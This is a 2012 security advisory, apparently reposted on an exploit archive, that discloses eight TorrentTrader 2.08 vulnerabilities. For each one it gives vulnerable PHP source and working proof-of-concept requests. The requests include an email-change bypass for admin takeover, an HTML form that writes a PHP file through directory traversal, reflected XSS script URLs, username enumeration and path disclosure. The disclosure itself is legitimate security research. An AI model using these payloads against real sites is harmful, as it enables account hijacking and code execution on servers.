TorrentTrader 2.08 XSS / Directory Traversal / Bypass Vulnerabilities

[waraxe-2012-SA#089] - Multiple Vulnerabilities in TorrentTrader 2.08
===============================================================================

Author: Janek Vind "waraxe"
Date: 17. September 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-89.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TorrentTrader is a feature packed and highly customisable PHP/MySQL Based BitTorrent
tracker. Featuring integrated forums, and plenty of administration options.

http://sourceforge.net/projects/torrenttrader/
http://www.torrenttrader.org/topic/14292-torrenttrader-v208-released/

###############################################################################
1. Unauthorized Email Change in "account-ce.php"
###############################################################################

Reason: authorization bypass
Attack vector: user submitted GET parameters "id", "secret" and "email"
Preconditions: none
Result: attacker can change any user's email, including admin's

-----------------[ source code start ]---------------------------------
$id = (int) $_GET["id"];
$md5 = $_GET["secret"];
$email = $_GET["email"];
..
$res = SQL_Query_exec("SELECT `editsecret` FROM `users` 
WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'");

$row = mysql_fetch_assoc($res);
..
$sec = $row["editsecret"];

if ($md5 != md5($sec . $email . $sec))
  show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);

SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)."
WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"]));
-----------------[ source code end ]-----------------------------------

Tests:

Let's find md5 hash of email "[email protected]", which is "b642b4217b34b1e8d3bd915fc65c4452".
Target user ID is 1. We issue GET request:

http://localhost/torrenttrader208/account-ce.php?id=1&
secret=b642b4217b34b1e8d3bd915fc65c4452&[email protected]

Quick look to the database confirms, that email address of user with ID 1
has been changed indeed. 

Next logical move for attacker is password recovery request:

http://localhost/torrenttrader208/account-recover.php

After admin account takeover attacker is able to use next vulnerability,
described below, which may allow php remote code execution.

###############################################################################
2. Arbitrary file creation / directory traversal in "nfo-edit.php"
###############################################################################

Reason: failure to properly sanitize user submitted data
Attack vector: user submitted POST parameters "id" and "content"
Preconditions:
 1. nfo-file editing privileges needed (usually admin)
 2. PHP must be < 5.3.4 for null-byte attacks to work
Result:
  1. attacker is able to write remote files with arbitrary content
  2. directory traversal vulnerability allows bypassing path restrictions


-----------------[ source code start ]---------------------------------
$id = (int)$_GET["id"]?$_GET["id"]:$_POST["id"]; 
$do = $_POST["do"];
  
$nfo = $site_config["nfo_dir"] . "/$id.nfo";
  
if ($do == "update") { 
  if (file_put_contents($nfo, $_POST["content"]))  
  {
    write_log("NFO ($id) was updated by $CURUSER[username].");
-----------------[ source code end ]-----------------------------------
  
Test: first we need html form like the one below:

<html><body><center>
<form action="http://localhost/torrenttrader208/nfo-edit.php"
method="post" enctype="multipart/form-data">
<input type="hidden" name="do" value="update">
<input type="hidden" name="id" value="test.php">
<input type="hidden" name="content" value="<?php phpinfo();?>">
<input type="submit" value="Test">
</form></center></body></html>


Log in as admin and then make POST request by cliking "Test" button.
We should see "NFO Updated" as response and can confirm new file existence:

http://localhost/torrenttrader208/uploads/test.php.nfo

By using null byte ("\0") it's possible writing files with arbitrary extension.
Finally, it is possible to make use of directory traversal strings "../"
and write files to arbitrary location in remote server.

###############################################################################
3. Username Enumeration Vulnerability in "account-login.php"
###############################################################################

Reason: different error messages for invalid username and invalid password
Attack vector: user submitted POST parameters "username" and "password"
Preconditions: none
Result: attacker can enumerate valid usernames

-----------------[ source code start ]---------------------------------
if (!empty($_POST["username"]) && !empty($_POST["password"])) {
  $res = SQL_Query_exec("SELECT id, password, secret, status, enabled FROM users
  WHERE username = " . sqlesc($_POST["username"]) . "");
  $row = mysql_fetch_array($res);

  if (!$row)
    $message = T_("USERNAME_INCORRECT");
  elseif ($row["status"] == "pending")
    $message = T_("ACCOUNT_PENDING");
  elseif ($row["password"] != $password)
    $message = T_("PASSWORD_INCORRECT");
-----------------[ source code end ]-----------------------------------

Tests:

Try to log in with nonexistent username:

"Username Incorrect"

Next, try valid username with incorrect password:

"Password Incorrect"

So it's obvious, that attacker is able to distinguish between valid and
invalid usernames and therefore username enumeration vulnerability exists.


###############################################################################
4. Reflected XSS in "faq.php"
###############################################################################
Preconditions: "register_globals=on"
Attack Vector: User provided parameter "faq_categ"
 
http://localhost/torrenttrader208/faq.php?faq_categ[0][title]=
<script>alert(String.fromCharCode(88,83,83))</script>&faq_categ[0][flag]=1
&faq_categ[0][items][0][question]=aa&faq_categ[0][items][0][answer]=bb
&faq_categ[0][items][0][flag]=1

http://localhost/torrenttrader208/faq.php?faq_categ[0][title]=test&faq_categ[0][flag]=1
&faq_categ[0][items][0][question]=<script>alert(String.fromCharCode(88,83,83))</script>
&faq_categ[0][items][0][answer]=bb&faq_categ[0][items][0][flag]=1

http://localhost/torrenttrader208/faq.php?faq_categ[0][title]=test&faq_categ[0][flag]=1
&faq_categ[0][items][0][question]=test&faq_categ[0][items][0][answer]=
<script>alert(String.fromCharCode(88,83,83))</script>&faq_categ[0][items][0][flag]=1


###############################################################################
5. Reflected XSS in "account-signup.php"
###############################################################################
Preconditions: "register_globals=on"
Attack Vector: User provided parameters "invite" and "secret"

http://localhost/torrenttrader208/account-signup.php?invite_row=1
&invite="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/torrenttrader208/account-signup.php?invite_row=1
&secret="><script>alert(String.fromCharCode(88,83,83))</script>


###############################################################################
6. Reflected XSS in "/themes/default/header.php"
###############################################################################
Preconditions: "register_globals=on"
Attack Vector: User provided parameters "title" and "site_config"

http://localhost/torrenttrader208/themes/default/header.php?
title=</title><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/torrenttrader208/themes/default/header.php?
site_config[CHARSET]="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/torrenttrader208/themes/default/header.php?
site_config[SITEURL]=--><script>alert(String.fromCharCode(88,83,83))</script>


###############################################################################
7. Reflected XSS in "/themes/NB-Clean/header.php"
###############################################################################
Preconditions: "register_globals=on"
Attack Vector: User provided parameters "title" and "site_config"

http://localhost/torrenttrader208/themes/NB-Clean/header.php?
title=</title><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/torrenttrader208/themes/NB-Clean/header.php?
site_config[CHARSET]="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/torrenttrader208/themes/NB-Clean/header.php?
site_config[SITEURL]="><script>alert(String.fromCharCode(88,83,83))</script>


###############################################################################
8. Path Disclosure vulnerability in multiple scripts
###############################################################################

http://localhost/torrenttrader208/account-login.php?returnto[]

Warning: htmlspecialchars() expects parameter 1 to be string, array given in
C:/apache_www/torrenttrader208/account-login.php on line 72

http://localhost/torrenttrader208/themes/default/footer.php

Fatal error: Call to undefined function T_() in
C:/apache_www/torrenttrader208/themes/default/footer.php on line 26

http://localhost/torrenttrader208/themes/default/header.php

Fatal error: Call to undefined function T_() in
C:/apache_www/torrenttrader208/themes/default/header.php on line 28

http://localhost/torrenttrader208/themes/NB-Clean/footer.php

Fatal error: Call to undefined function T_() in
C:/apache_www/torrenttrader208/themes/NB-Clean/footer.php on line 22

http://localhost/torrenttrader208/faq.php?faq_categ=1

Fatal error: Cannot use string offset as an array in
C:/apache_www/torrenttrader208/faq.php on line 17

http://localhost/torrenttrader208/rss.php?cat[]

Warning: explode() expects parameter 2 to be string, array given in
C:\apache_www\torrenttrader208\rss.php on line 119

http://localhost/torrenttrader208/backend/smilies.php?action=display&form[]

Warning: htmlspecialchars() expects parameter 1 to be string, array given in
C:\apache_www\torrenttrader208\backend\smilies.php on line 50


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[email protected]
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------



#  0day.today [2018-04-08]  #